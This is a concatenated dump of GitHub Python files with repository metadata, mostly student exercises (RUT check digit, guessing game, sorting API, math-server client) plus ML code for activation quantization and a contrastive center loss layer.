event_img_loader,\n prev_img_loader,\n next_img_loader,\n n_ima,\n is_training=True)\n\n if args.sacred:\n @sacred_exp.main\n def train_wrapped():\n return trainer.train()\n sacred_exp.run()\n else:\n trainer.train()\n \nif __name__ == \"__main__\":\n 
main()\n","repo_name":"marcocannici/matrixlstm","sub_path":"opticalflow/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"29346546329","text":"#Cálculo del dígito verificador de un rut\nrut=int(input(\"Ingrese un rol único tributario: \"))\n\n#Formula digito x digito\npd = (rut//10000000)\nsd = ((rut//1000000)%10)\ntd = ((rut//100000)%10)\ncd = ((rut//10000)%10)\nqd = ((rut//1000)%10)\nsed = ((rut//100)%10)\nsepd = ((rut//10)%10)\nod = ((rut)%10)\n\n#Desarrollo del calculo\ncalculo = ((pd*3)+(sd*2)+(td*7)+(cd*6)+(qd*5)+(sed*4)+(sepd*3)+(od*2))\nx = calculo // 11\ny = calculo -(11*x)\nresultado = 11 - y\n\n#Especificaciones\nif resultado == 11:\n print(\"dv=\"+\"0\")\n\nelse:\n if resultado == 10:\n print(\"dv=\"+\"k\")\n\n else:\n print(\"dv=\",end=\"\")\n print(resultado)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_d8f274901e0d61269f9e5630aed1a18b.py","file_name":"hito1_ej5_d8f274901e0d61269f9e5630aed1a18b.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29312141229","text":"#Juego adivina mi número\nimport random\nn=random.randint(1,20)\ni=0\nprint('tienes 5 intentos para adivinar mi numero')\nwhile i<5:\n jugador=int(input('>>>> ingresa un numero: '))\n if jugadorn:\n print('el numero que ingresaste es mayor al numero secreto')\n i+=1\n elif jugador==n:\n print('¡ADIVINASTE!, felicitaciones mi número era', n)\nelse: \n print('¡Mala suerte! no adivinaste, mi número era ',n) ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej12/hito1_ej12_d64371c5549376406357051b356ecb41.py","file_name":"hito1_ej12_d64371c5549376406357051b356ecb41.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29485635469","text":"class Matriz:\n def __init__(self, celdas=[]):\n self.celdas = celdas\n\n def __repr__(self):\n s = \"\"\n for i in range(len(self.celdas)):\n for j in range(len(self.celdas[i])):\n s += \"{0: >5} \".format(self.celdas[i][j])\n s += \"\\n\"\n return s\n\n def __mul__(self, other):\n if len(self.celdas[0]) != len(other.celdas):\n raise ValueError(\"No se pueden multiplicar las matrices. 
El número de columnas de la primera matriz debe ser igual al número de filas de la segunda matriz.\")\n\n resultado = []\n for i in range(len(self.celdas)):\n fila_resultado = []\n for j in range(len(other.celdas[0])):\n suma = 0\n for k in range(len(self.celdas[0])):\n suma += self.celdas[i][k] * other.celdas[k][j]\n fila_resultado.append(suma)\n resultado.append(fila_resultado)\n\n return Matriz(resultado)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema9_ej2/tema9_ej2_4c8d8f087995b0de7dd597912841a5bf.py","file_name":"tema9_ej2_4c8d8f087995b0de7dd597912841a5bf.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8050690465","text":"from twilio.rest import Client\nfrom pyngrok import ngrok\nimport os\nfrom decouple import config\n\n\ndef update_ngrok_url():\n url = ngrok.connect(8000).public_url\n print(' * Tunnel URL:', url)\n account_sid = config('TWILIO_ACCOUNT_SID')\n auth_token = config('TWILIO_AUTH_TOKEN')\n client = Client(account_sid, auth_token)\n incoming_phone_numbers = client.incoming_phone_numbers.list(limit=20)\n\n for record in incoming_phone_numbers:\n print(record.friendly_name)\n if record.friendly_name == '(825) 251-9025':\n client.incoming_phone_numbers(record.sid).update(voice_url=url + '/shipping_ivr/welcome')\n\n\nif __name__ == '__main__':\n update_ngrok_url()\n","repo_name":"PavithraGunasekaran/Cloud-IVR-System","sub_path":"ivr/shipping_ivr/utils/ngrok_update.py","file_name":"ngrok_update.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20877667742","text":"#defi 1\nmot=input(\"entrer un mot :\")\ndico={}\nfor i in range(len(mot)):\n if mot[i] not in dico:\n dico[mot[i]]=[]\n dico[mot[i]].append(i)\nprint(dico)\n\n\n#defi 2\nitems_purchase={\n \"sac\":5000,\n \"nano\":90000,\n \"pc hp\":20000,\n \"apple\":600000,\n \"sirius\":400000\n}\n\nwallet=100000\n\ngood_items=[]\n\nfor i in items_purchase:\n if items_purchase[i] <=wallet:\n good_items.append(i)\n\nif len(good_items)==0:\n print(\"Rien\")\nelse:\n print(good_items)","repo_name":"sidiki-codeur/di-bootcamp-stage1","sub_path":"week-4/day-3/defi.py","file_name":"defi.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18040608139","text":"# from sys import stdin\n\n# stdin = open('input.txt', 'r')\n# input = stdin.readline\n\n# inputs\nn, k = map(int, input().split())\ncoins = [int(input()) for _ in range(n)]\n\n# init\ncnt = 0\n\n# exe\ndef sol(k, coins):\n global cnt\n my_list = coins[:]\n while True:\n coin = my_list.pop()\n if coin <= k:\n break\n q = k // coin\n for num in range(q, -1, -1):\n r = k - num * coin\n # print(\"k: \", k, \"coin: \", coin, \"num: \", num, \"r: \", r)\n if r == 0:\n cnt += 1\n elif len(my_list) >= 2:\n sol(r, my_list)\n elif len(my_list) == 1:\n if r % my_list[0] == 0:\n cnt += 1\n \nsol(k, coins)\nprint(cnt)","repo_name":"ririro93/algorithm_probs","sub_path":"Baekjoon/2nd_week/2293.py","file_name":"2293.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41826825536","text":"# -*- coding: utf-8 -*-\nimport http.client,json,os\nimport codecs\n\n#proxy sans schema\nproxy=None\nnoproxy=0\nhost = 
\"www.irem.sciences.univ-nantes.fr\"\nuser=None\n#host='localhost:8080'\n\nservice = '/mathinfo/x3m0080'\n\ndef get_proxy() :\n global proxy\n if proxy : return \n proxy=os.getenv('http_proxy')\n if not proxy : proxy = os.getenv('HTTP_PROXY')\n if proxy and proxy[:7] == \"http://\" :\n proxy = proxy[7:]\n\ndef do_request(method, host, path, **args) :\n if not noproxy : get_proxy()\n if proxy :\n h = http.client.HTTPConnection(proxy)\n h.request(method, 'http://' + host + path, **args)\n else:\n h = http.client.HTTPConnection(host)\n h.request(method, path,**args)\n resp = h.getresponse()\n status = resp.status\n reason = resp.reason\n bd = resp.read().decode('utf-8')\n h.close()\n return status,reason,bd\n\ndef show_example(taskid) :\n path = service + '/example/' + taskid\n status,r,bd = do_request('GET',host,path)\n if status == 200:\n bd = json.loads(bd)\n print(\"Input :\" , bd['input'])\n print(\"Result :\" , bd['result'])\n elif status == 404:\n print(bd)\n print(taskid,\"not found\")\n else:\n print(\"Error:\",status,r,bd)\n\ndef get_user() :\n global user\n if user != None:\n etud = user\n else:\n etud = os.getenv(\"LOGNAME\").upper()\n if etud[0] == 'E' : etud = etud[1:]\n print(\"Identifiant :\", etud)\n return etud\n\ndef set_user(usr):\n global user\n user = str(usr)\n\ndef get_task(taskid) :\n path = service + '/task/' + taskid\n status,r,bd = do_request('GET',host,path)\n if status == 200:\n bd = json.loads(bd)\n return bd['hash'], bd['input']\n if status == 404 :\n print(bd)\n print(taskid, \"not found\")\n else:\n print(\"Error:\",status,r,bd)\n\ndef check_task(taskid,h,result) :\n path = service + '/task/' + taskid\n body = {'user': get_user(), 'hash':h, 'result': result}\n status,r,bd = do_request('PUT',host,path,body=json.dumps(body))\n if status == 202:\n print(\"Input accepté\")\n return True\n elif status == 406:\n print(\"Input refusé\")\n return False\n elif status == 410:\n print(\"Hash gone : please retry\")\n elif status == 404:\n print(\"Resource not found :\", bd)\n else:\n print(\"Error:\",status,r)\n print(\"EMsg :\",bd)\n\ndef hello(etud=None) :\n if not etud : etud = get_user()\n path = service + '/hello/' + etud\n status,r,bd = do_request('GET',host,path)\n if status == 302:\n print(\"User \", etud, \"found\")\n elif status == 404:\n print(\"User \", etud, \"not found\")\n else:\n print (\"Error :\", status, r, bd)\n\ndef tasklist() :\n hello()\n path = service + \"/tasklist\"\n s,r,bd = do_request(\"GET\",host,path)\n if s == 200 :\n print(\"Tasks :\", bd)\n\n\ndef accepted_tasks() :\n user = get_user()\n path = service + '/users/' + user\n s,r,bd = do_request(\"GET\",host,path)\n if s == 200 :\n print(\"Accepted tasks :\",bd)\n elif s == 404 :\n print(s,r,\"User not found\\n\",bd)\n else :\n print(\"Error :\",s,r,bd)\n\n\n__help = \"\"\"\nCe module définit trois fonctions :\n\nhello() : Est-ce que le serveur vous connait ?\n\ntasklist() : List des exos.\n\nshow_example(exo) : Cette fonction affiche des exemples pour\n l'exercice spécifié par l'entier exo.\n\nget_task(exo) : Cette fonction prend comme argument\n un entier qui est un numéro d'exercice.\n Elle renvoie un couple (id,param) où\n id est un numéro identifiant le dataset\n param est l'argument pour la fonction\n client.\n\ncheck_task(exo,id,result) : Cette fonction envoie le resultat de la\n fonction client.\n\naccepted_tasks() : Liste des taches acceptees.\n\nset_user(user) : Définir le nom d'utilisateur.\n\nvalid_() : Valider un exercice.\n\nvalid_tasks() : Valider l'ensemble des 
exercices.\n\ngenerate_primes(n,ppath) : Génère la liste des nombres premiers\n inférieurs à n et enregistre cette liste\n dans le fichier ppath au format json.\n\nAlexis Giraudet\n\"\"\"\n\ndef info() : print(__help)\n \nif __name__ == \"__main__\" :\n info()\n\n# Alexis Giraudet\n\nimport math, json, threading\n\ndef trivialtask(ls):\n ls.reverse()\n return ls\n\ndef valid_trivialtask():\n print(\"valid trivialtask...\")\n (idt, paramt) = get_task(\"trivialtask\")\n print(\"id =\", idt)\n print(\"param =\", paramt)\n result = trivialtask(paramt)\n print(\"result =\", result)\n check_task(\"trivialtask\", idt, result)\n\ndef base_ecriture(ls):\n res = list()\n for i in ls:\n n = list()\n quo = i[0]\n base = i[1]\n while quo > 0:\n n.insert(0, quo % base)\n quo = quo // base\n res.append(n)\n return res\n\ndef valid_base_ecriture():\n print(\"valid base_ecriture...\")\n (idt, paramt) = get_task(\"base_ecriture\")\n print(\"id =\", idt)\n print(\"param =\", paramt)\n result = base_ecriture(paramt)\n print(\"result =\", result)\n check_task(\"base_ecriture\", idt, result)\n\ndef primes(ls):\n res = list()\n for i in ls:\n if i < 2:\n res.append(False)\n else:\n for n in range(2, int(math.sqrt(i))+1):\n if (i % n) == 0:\n res.append(False)\n break\n else:\n res.append(True)\n return res\n\ndef valid_primes():\n print(\"valid primes...\")\n (idt, paramt) = get_task(\"primes\")\n print(\"id =\", idt)\n print(\"param =\", paramt)\n result = primes(paramt)\n print(\"result =\", result)\n check_task(\"primes\", idt, result)\n\ndef factors(ls, ppath=\"./prime_numbers.json\"):\n res = list()\n pr = list()\n try:\n with open(ppath, \"r\") as pfile:\n print(\"load prime numbers from file...\")\n pr = json.load(pfile)\n print(len(pr), \"prime numbers loaded from file\")\n pfile.close()\n except IOError:\n pr = [2,3]\n for i in ls:\n print(\"number =\", i)\n if primes([i]) == [True]:\n res.append([[i,1]])\n else:\n fa = list()\n dcc = i\n for p in pr:\n if (dcc % p) == 0:\n acc = 0\n while ((dcc % p) == 0) and (dcc > 1):\n acc += 1\n dcc = dcc // p\n fa.append([p,acc])\n if dcc == 1:\n break\n else:\n print(\"generate new prime numbers...\")\n for j in range(pr[-1]+2,i,2):\n if primes([j]) == [True]:\n pr.append(j)\n if (dcc % j) == 0:\n acc = 0\n while ((dcc % j) == 0) and (dcc > 1):\n acc += 1\n dcc = dcc // j\n fa.append([j,acc])\n if dcc == 1:\n break\n res.append(fa)\n return res\n\ndef valid_factors():\n print(\"valid factors...\")\n (idt, paramt) = get_task(\"factors\")\n print(\"id = \", idt)\n print(\"param =\", paramt)\n result = factors(paramt)\n print(\"result = \", result)\n check_task(\"factors\", idt, result)\n\ndef stirling_rec(ls):\n def stirling(m, n):\n if m < n:\n return 0\n elif m == n:\n return math.factorial(m)\n elif n == 1:\n return 1\n elif n == 2:\n return (2**m)-2\n else:\n return n*(stirling(m-1, n) + stirling(m-1, n-1))\n return stirling(ls[0], ls[1])\n\ndef stirling(ls):\n if ls[0] < ls[1]:\n return 0\n elif ls[0] == ls[1]:\n return math.factorial(m)\n elif ls[1] == 1:\n return 1\n else:\n lm0 = dict()\n lm0[1] = 1\n lm1 = dict()\n for m in range(1,ls[0]-1):\n for n in range(1,ls[1]+1):\n try:\n sm1n = lm0[n]\n except:\n sm1n = 0\n try:\n sm1n1 = lm0[n-1]\n except:\n sm1n1 = 0\n lm1[n] = n*(sm1n+sm1n1)\n lm0 = lm1\n lm1 = dict()\n return ls[1]*(lm0[ls[1]]+lm0[ls[1]-1])\n\ndef valid_stirling():\n print(\"valid stirling...\")\n (idt, paramt) = get_task(\"stirling\")\n print(\"id = \", idt)\n print(\"param =\", paramt)\n result = stirling(paramt)\n print(\"result = \", 
result)\n check_task(\"stirling\", idt, result)\n\ndef bezout(ls):\n a = ls[0]\n b = ls[1]\n def bezout(u,v,r,uu,vv,rr):\n if rr == 0:\n return [r, u, v]\n else:\n q = r//rr\n return bezout(uu,vv,rr,u-q*uu,v-q*vv,r-q*rr)\n return bezout(1,0,a,0,1,b)\n\ndef valid_bezout():\n print(\"valid bezout...\")\n (idt, paramt) = get_task(\"bezout\")\n print(\"id = \", idt)\n print(\"param =\", paramt)\n result = bezout(paramt)\n print(\"result = \", result)\n check_task(\"bezout\", idt, result)\n\ndef valid_tasks():\n tasklist()\n print()\n valid_trivialtask()\n print()\n valid_base_ecriture()\n print()\n valid_primes()\n print()\n valid_factors()\n print()\n valid_stirling()\n print()\n valid_bezout()\n print()\n accepted_tasks()\n\ndef generate_primes(n=50000000, ppath=\"./prime_numbers.json\"):\n with open(ppath, \"w\") as pfile:\n pr = list()\n pr.append(2)\n for i in range(3,n,2):\n if primes([i]) == [True]:\n pr.append(i)\n json.dump(pr,pfile)\n pfile.close()\n\nclass primes_async(threading.Thread):\n def __init__(self, list_e, list_p):\n threading.Thread.__init__(self)\n self.list_e = list_e\n self.list_p = list_p\n\n def run(self):\n while len(self.list_e) > 0:\n try:\n i = self.list_e.pop()\n if primes([i]) == [True]:\n self.list_p.append(i)\n except IndexError:\n break\n\ndef generate_primes_async(n=50000000, ppath=\"./prime_numbers.json\", nthreads=4):\n with open(ppath, \"w\") as pfile:\n list_e = list(range(3,n,2))\n list_p = list()\n list_p.append(2)\n \n list_t = list()\n for i in range(nthreads):\n t = primes_async(list_e, list_p)\n t.start()\n list_t.append(t)\n for t in list_t:\n t.join()\n list_p.sort()\n json.dump(list_p,pfile)\n pfile.close()\n","repo_name":"Giraudux/python3-maths","sub_path":"src/submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":10789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73733246330","text":"\nimport copy\nfrom typing import Sequence\nimport torch\nfrom torch.functional import Tensor\nimport torch.nn as nn\nimport os\n\nfrom zmq import device \n#from .pwlq import *\nfrom .uniform import *\n\n##########################################################################################\n#### Quantization of Activations \n##########################################################################################\n\nclass QuantAct(nn.Module):\n '''\n Quantize actications including:\n (1) the input of conv layer\n (2) the input of linear fc layer\n (3) the input of pooling layer\n '''\n def __init__(self, act_bits, get_stats, minv=None, maxv=None, \n cali_sample_size=512, cali_batch_size=4, topk=10):\n '''\n cali_sample_size: calibration sample size, typically from random training data\n cali_batch_size: calibration sampling batch size\n topk: calibrate topk lower and upper bounds\n '''\n super(QuantAct, self).__init__()\n self.act_bits = act_bits\n self.get_stats = get_stats\n self.index = 0\n self.topk = topk\n self.sample_batches = cali_sample_size // cali_batch_size\n stats_size = (self.sample_batches, self.topk) if self.get_stats else 1\n self.register_buffer('minv', torch.zeros(stats_size))\n self.register_buffer('maxv', torch.zeros(stats_size))\n\n def forward(self, x):\n if self.get_stats:\n y = x.clone()\n y = torch.reshape(y, (-1,))\n y, indices = torch.sort(y)\n topk_mins = y[:self.topk]\n topk_maxs = y[-self.topk:]\n if self.index < self.sample_batches:\n self.minv[self.index, :] = topk_mins\n self.maxv[self.index, :] = topk_maxs\n self.index += 1\n\n if 
self.act_bits > 0:\n ## uniform quantization\n print (self.minv,'===')\n if self.minv is not None:\n if self.minv >= 0.0: # activation after relu\n self.minv *= 0.0\n self.signed = False\n else: \n self.maxv = max(-self.minv, self.maxv) \n self.minv = - self.maxv\n self.signed = True\n x = uniform_symmetric_quantizer(x, bits=self.act_bits, \n minv=self.minv, maxv=self.maxv, signed=self.signed)\n return x\n\n\ndef quant_model_acts(model, act_bits, get_stats, cali_batch_size=4):\n \"\"\"\n Add quantization of activations for a pretrained model recursively\n \"\"\"\n if type(model) in [nn.Conv2d, nn.Linear, nn.AdaptiveAvgPool2d]:\n quant_act = QuantAct(act_bits, get_stats, cali_batch_size=cali_batch_size)\n return nn.Sequential(quant_act, model)\n elif type(model) == nn.Sequential:\n modules = []\n for name, module in model.named_children():\n modules.append(quant_model_acts(module, act_bits, get_stats, cali_batch_size=cali_batch_size))\n return nn.Sequential(*modules)\n else:\n quantized_model = copy.deepcopy(model)\n for attribute in dir(model):\n module = getattr(model, attribute)\n if isinstance(module, nn.Module):\n setattr(quantized_model, attribute, \n quant_model_acts(module, act_bits, get_stats, cali_batch_size=cali_batch_size))\n return quantized_model\n\n\ndef simple_quant_mode_acts(model,bit=8,name='',mode='monitor'):\n\n if type(model) in [nn.Conv2d]:\n if mode == 'monitor':\n return nn.Sequential(model,SimpleLimit(name=name,mode='monitor'))\n if mode == 'qunatized_act':\n return nn.Sequential(SimpleQunAct(name=name),model,SimpleLimit(name=name))\n if type(model) == nn.Sequential:\n output = []\n num = 0\n for name_,modules in model.named_children():\n output.append(simple_quant_mode_acts(modules,name=(name+str(num)) ))\n num+=1\n return nn.Sequential(*output)\n \n\n quantized_model = copy.deepcopy(model)\n for attribute in dir(model):\n module = getattr(model, attribute)\n if isinstance(module, nn.Module):\n setattr(quantized_model, attribute,simple_quant_mode_acts(module,name=(name+attribute)))\n return quantized_model\n\n\n\n\n\nclass SimpleQunAct(nn.Module):\n allLayer = []\n def __init__(self,bit=8,mode='forward',function='None',name='') -> None:\n super(SimpleQunAct, self).__init__()\n self.bit = bit\n self.mode = mode\n self.func = function\n self.name = name\n self.maxQ = None\n self.minQ = None\n SimpleQunAct.allLayer.append(self)\n\n def __repr__(self):\n return super().__repr__()[:-1]+self.name+ '('+self.mode+'_'+self.func +'))'\n\n def load_min_max(self,addr):\n pass\n self.maxQ = torch.load(os.path.join(addr,self.name+'_max.pt'))\n self.minQ = torch.load(os.path.join(addr,self.name+'_min.pt'))\n\n\n\n def forward(self,x):\n if self.mode == 'forward':\n #print ('-'*100)\n #print (self.maxQ.shape)\n #print (x.shape)\n \n \n return x\n if self.mode == 'monitor':\n if self.func == 'Border':\n if self.maxQ is not None:\n temp = torch.amax(x,dim=(0,2,3))\n self.maxQ = torch.max(temp,self.maxQ)\n else:\n self.maxQ = torch.amax(x,dim=(0,2,3))\n\n if self.minQ is not None:\n temp = torch.amin(x,dim=(0,2,3))\n self.minQ = torch.min(temp,self.minQ)\n else:\n self.minQ = torch.amin(x,dim=(0,2,3))\n\n\n\n return x \n if self.mode == 'quan':\n\n\n return x\n\n\nclass SimpleLimit(nn.Module):\n allLayer = []\n def __init__(self,mode='forward',name='') -> None:\n super(SimpleLimit, self).__init__()\n self.mode = mode\n self.name = name\n self.maxQ = None\n self.minQ = None\n SimpleLimit.allLayer.append((name,self))\n\n\n def save_min_max(self,path):\n min_addr = 
os.path.join(path,self.name+'_min.pt')\n max_addr = os.path.join(path,self.name+'_max.pt')\n torch.save(self.minQ,min_addr)\n torch.save(self.maxQ,max_addr)\n\n def load_min_max(self,path):\n min_addr = os.path.join(path,self.name+'_min.pt')\n max_addr = os.path.join(path,self.name+'_max.pt')\n self.minQ = torch.load(min_addr)\n self.maxQ = torch.load(max_addr)\n\n\n def setMode(self,newMode):\n self.mode = newMode\n\n def __repr__(self):\n return super().__repr__()[:-1]+self.name+'('+self.mode+'))'\n\n def forward(self,x):\n if self.mode == 'forward':\n return x\n if self.mode == 'monitor':\n if self.maxQ is not None:\n temp = torch.amax(x,dim=(0,2,3))\n self.maxQ = torch.max(temp,self.maxQ)\n else:\n self.maxQ = torch.amax(x,dim=(0,2,3))\n \n if self.minQ is not None:\n temp = torch.amin(x,dim=(0,2,3))\n self.minQ = torch.min(temp,self.minQ)\n else:\n self.minQ = torch.amin(x,dim=(0,2,3))\n return x \n if self.mode == 'org_bound':\n for i in range(x.shape[1]):\n x[:,i,:,:] = torch.clamp(x[:,i,:,:],min=self.minQ[i],max=self.maxQ[i])\n\n return x\n\n if self.mode == 'limit_bound':\n for i in range(x.shape[1]):\n x[:,i,:,:] = torch.clamp(x[:,i,:,:],min=self.minQ[i]*self.limit,max=self.maxQ[i]*self.limit)\n\n return x\n\n\n if self.mode == 'quan':\n return x\n","repo_name":"alisahebdad/simple-quantization","sub_path":"quant/quant_acts.py","file_name":"quant_acts.py","file_ext":"py","file_size_in_byte":7708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6001795472","text":"from fastapi import FastAPI\nimport pymysql.cursors\nfrom fastapi.responses import JSONResponse\nfrom AMP.modelos.professor import ProfessorCadastro\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom AMP.algoritmos import quicksort, bubblesort\nimport time\n\ndef abre_conexao(nome_db):\n conexao = pymysql.connect(\n host = '127.0.0.1',\n user = 'root',\n password = '',\n db = nome_db,\n charset = 'utf8mb4',\n cursorclass = pymysql.cursors.DictCursor\n )\n return conexao\n\ndef fecha_conexao(conexao, cursor):\n cursor.close()\n conexao.close()\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=['*'],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n@app.get('/professor')\nasync def recupera_prof():\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n cursor.execute(\"select * from professor;\")\n dados = cursor.fetchall()\n fecha_conexao(conexao, cursor)\n return {\"resposta\":dados, 'tempo':0, 'numero':len(dados)}\n\n@app.post('/professor', status_code=201)\nasync def cadastra_prof(professor:ProfessorCadastro):\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n\n query = f'insert into professor(nome, preco, materia, contato, obs) values(\"{professor.nome}\", {professor.preco}, \"{professor.materia}\", \"{professor.contato}\", \"{professor.obs}\");'\n cursor.execute(query)\n\n id_retorno = cursor.lastrowid\n\n fecha_conexao(conexao, cursor)\n\n return {'id_cadastrado':id_retorno}\n\n@app.get('/prof_quick_preco')\nasync def recupera_prof_quick():\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n\n cursor.execute(\"select * from professor;\")\n dados = cursor.fetchall()\n\n fecha_conexao(conexao, cursor)\n\n inicio = time.time()\n quicksort(dados, 0, len(dados)-1, 'preco')\n fim = time.time()\n\n tempo = fim-inicio\n\n return {\"resposta\":dados, 'tempo':tempo, 'numero':len(dados)}\n\n@app.get('/prof_quick_nome')\nasync def recupera_prof_quick():\n 
conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n\n cursor.execute(\"select * from professor;\")\n dados = cursor.fetchall()\n\n fecha_conexao(conexao, cursor)\n\n inicio = time.time()\n quicksort(dados, 0, len(dados)-1, 'nome')\n fim = time.time()\n\n tempo = fim-inicio\n\n return {\"resposta\":dados, 'tempo':tempo, 'numero':len(dados)}\n\n@app.get('/prof_bubble_preco')\nasync def recupera_prof_bubble():\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n\n cursor.execute(\"select * from professor;\")\n dados = cursor.fetchall()\n\n fecha_conexao(conexao, cursor)\n\n inicio = time.time()\n bubblesort(dados, len(dados),'preco')\n fim = time.time()\n\n tempo = fim-inicio\n\n return {\"resposta\":dados, 'tempo':tempo, 'numero':len(dados)}\n\n@app.get('/prof_bubble_nome')\nasync def recupera_prof_bubble():\n conexao = abre_conexao('projetoamp')\n cursor = conexao.cursor()\n\n cursor.execute(\"select * from professor;\")\n dados = cursor.fetchall()\n\n fecha_conexao(conexao, cursor)\n\n inicio = time.time()\n bubblesort(dados, len(dados),'nome')\n fim = time.time()\n\n tempo = fim-inicio\n\n return {\"resposta\":dados, 'tempo':tempo, 'numero':len(dados)}","repo_name":"pedrofaleiros/projeto","sub_path":"api/AMP/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11318733801","text":"import art\r\nimport os\r\n\r\n\r\ndef highest_bidder(bid_record):\r\n score = 0\r\n for bidder in bid_record:\r\n bidder_score = bid_record[bidder]\r\n if bidder_score > score:\r\n score = bidder_score\r\n current_winner = bidder\r\n print(f\"The winner is {current_winner} with a bid of ${score}\")\r\n\r\n\r\nprint(art.logo)\r\nbidders = {}\r\ngame_on = True\r\n\r\nwhile game_on:\r\n name = input(\"Enter the bidders name: \")\r\n bid_price = float(input(\"Enter bidding price: \"))\r\n\r\n bidders[name] = bid_price\r\n more_bidders = input(\"Are there any more bidders? 'yes' or 'no'? 
\").lower()\r\n if more_bidders == 'no':\r\n game_on = False\r\n highest_bidder(bidders)\r\n elif more_bidders == 'yes':\r\n os.system('cls')\r\n pass\r\n else:\r\n print(\"invalid choice.\")\r\n","repo_name":"PeterPan2151/100_Python_days_codes","sub_path":"Day_9/project/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2359438701","text":"import tensorflow as tf\nimport tensorflow.keras.backend as K\nimport numpy as np\n\nclass ContrastiveCenterLossLayer(tf.keras.layers.Layer):\n\n def __init__(self, class_count, alpha=0.5, delta = 1.0, **kwargs):\n super().__init__(**kwargs)\n self.alpha = alpha\n self.class_count = class_count\n #self.ones = K.ones((1, self.class_count, 1), dtype=np.float32)\n self.ones = dict()\n self.ones[str(None)] = K.ones((1, self.class_count, 1), dtype=np.float32)\n self.delta = K.constant(delta)\n\n def build(self, input_shape):\n features_count = 1\n for i in range(1, len(input_shape[0])):\n features_count *= input_shape[0][i]\n\n self.centers = self.add_weight(name='centers',\n shape=(1, self.class_count, features_count),\n initializer='uniform',\n trainable=False)\n # self.counter = self.add_weight(name='counter',\n # shape=(1,),\n # initializer='zeros',\n # trainable=False) # just for debugging\n super().build(input_shape)\n\n def call(self, x, mask=None):\n # x[0] is NxF, x[1] is NxC label, self.centers is 1xCxF\n\n #preparing elements\n FV = x[0]\n L = x[1]\n FV = tf.expand_dims(FV, axis = -1)\n L = tf.expand_dims(L, axis = -1)\n centers_N = self.centers\n\n\n ### FORWARD PASS ###\n\n #print('FV:', FV.shape)\n #print('L:', L.shape)\n #print('CN:', centers_N.shape)\n\n # 1_c(N, C, 1) FV(N, F, 1)\n # 1_c * FV^T - (N, C, F)\n ones = None\n try:\n ones = self.ones[str(FV.shape[0])]\n except:\n self.ones[str(FV.shape[0])] = K.repeat_elements(self.ones[str(None)], FV.shape[0], axis=0)\n ones = self.ones[str(FV.shape[0])]\n #print(ones)\n\n FVV = K.batch_dot(ones, FV, (2, 2))\n \n #print('FVV:', FVV.shape)\n #(N, C, F)\n dFVV = FVV - centers_N\n #print('dFVV:', dFVV.shape)\n #(N, C, 1)\n dFVV2 = K.sum(dFVV ** 2, axis = 2, keepdims = True)\n #print('dFVV2:', dFVV2.shape)\n\n # L(N, C, 1) dFVV2(N, C, 1)\n # L^T * dFVV2 - (N, 1, 1)\n NUM = K.batch_dot(L, dFVV2, (1, 1))\n #print('NUM:', NUM.shape)\n\n #inverse_L (N, C, 1)\n inverse_L = ones - L\n\n # _L(N, C, 1) dFVV2(N, C, 1)\n # _L^T * dFVV2 - (N, 1, 1)\n DENUM = K.batch_dot(inverse_L, dFVV2, (1, 1))\n DENUM = DENUM + self.delta\n #print('DENUM:', DENUM.shape)\n \n\n #CCL - (N, 1, 1)\n CLPerSample = NUM / DENUM\n\n #CCL = (N, 1)\n CLPerSample = K.reshape(CLPerSample, (-1, 1))\n #print('res:', CLPerSample.shape)\n\n ### BACKWARD PASS ###\n\n #(N, 1, 1)\n DENUM2 = DENUM ** 2\n \n # -(N, C, F) * (N, C, 1) = (N, C, F)\n true_update_part = -dFVV * L\n #(N, C, F) /= (N, 1, 1)\n true_update_part /= DENUM\n #print('TUP:', true_update_part.shape)\n\n # (N, C, F) * (N, 1, 1) * (N, C, 1) = (N, C, F)\n false_update_part = dFVV * NUM * inverse_L\n #(N, C, F) /= (N, 1, 1)\n false_update_part /= DENUM2\n #print('FUP:', false_update_part.shape)\n #(N, C, F)\n update = true_update_part + false_update_part\n #(1, C, F)\n update = K.sum(update, axis = 0, keepdims = True)\n #print('U:', update.shape)\n new_centers = self.centers - self.alpha*update \n #print('NC:', new_centers.shape)\n\n self.add_update((self.centers, new_centers))\n\n return CLPerSample\n\n ### END ### \n\n def 
